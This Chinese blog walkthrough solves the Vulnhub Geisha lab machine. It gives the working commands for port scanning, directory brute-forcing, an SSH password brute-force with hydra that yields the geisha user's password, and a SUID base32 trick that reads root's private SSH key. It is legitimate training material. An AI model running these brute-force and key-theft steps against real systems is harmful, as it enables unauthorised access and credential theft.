Vulnhub:Geisha靶机

kali:192.168.111.111

靶机:192.168.111.216

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.216

image

7125端口目录爆破

feroxbuster -k -d 2 --url http://192.168.111.216:7125 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x php,bak,txt,html,sql,zip,phtml,sh -t 1 -e

image

passwd文件发现用户名

image

hydra爆破ssh,得到用户密码:geisha | letmein

hydra -l geisha -P /usr/share/wordlists/rockyou.txt 192.168.111.216 -s 22 ssh -t 64

image

提权

查看suid权限的文件

find / -perm -u=s 2> /dev/null

image

发现该命令可以读取任意文件:https://gtfobins.github.io/gtfobins/base32/#suid

image

读取root用户的私钥

LFILE=/root/.ssh/id_rsa
base32 "$LFILE" | base32 --decod

image

使用私钥登录

image

flag

image

posted @ 2023-03-06 21:46  ctostm  阅读(54)  评论(0)    收藏  举报